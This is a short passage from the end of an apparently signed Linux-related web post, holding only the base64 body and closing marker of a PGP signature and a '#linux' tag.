dbL5PhAAspmKHEa29DXuwNjJ/3l96fX2AiuPj5NDhoSF01tfakpNE0w86c8GiGvw  
GRhGQ0n1AO9qNcfyULjWjtQ8FwFuRPzPI0mfaycW2oDQ3BAG2LtFqmQvpUzTV6tP  
pckL2H50ptablRYlphFEY0XDt42ezU3wjokNK/cpRhZlzCs7mvd6LuCg5qXwBno/  
srsxlb4n1IdZRF5mh7ariYpObDvLUctwhri7RCBEqb6MZh+y6rSSPKsGdCHq/su2  
6KEH0mxNPwMJtccNah29SWvv+fZ9+mkK1IuuWIdhyM2XMTJxOE4n0AsoISVGI6bH  
9XgL0AQ3B3kyoqHbfCyoUonbz4mSdTFInqpuqlU0X6Wos+kjnS/27sH/De8ba+mm  
jmDDQFmoe1QrVkbDjXI7zBy81Qh3nVZ/qig/1SCex0i+IyO4HpdCYbjrs7I76C0V  
fvpd0VWb3BKpGHA4IhISA/jmCSlvxW+2gkHrhxfWhM1K3Pa/a0qH9RuCFAZ7B9qP  
OQM3Yrhbikqyaqh/ZI7nYMc33KfiPCiXKejDtaTGIVVThKHr1mQibgaYt+ILi0RH  
8uxH+tpuVqjEgVHZQMBQEAa3WvaGYo2kJJxU0z+3m/s6W45JhGguMzrH/n9z6XKo  
H4xyTp1YQ3aP6gZBgoMEkipkc0B+QK/zb+xOghfE3Cbjdx47gCo=  
=E60q  
-----END PGP SIGNATURE-----

Tag

#linux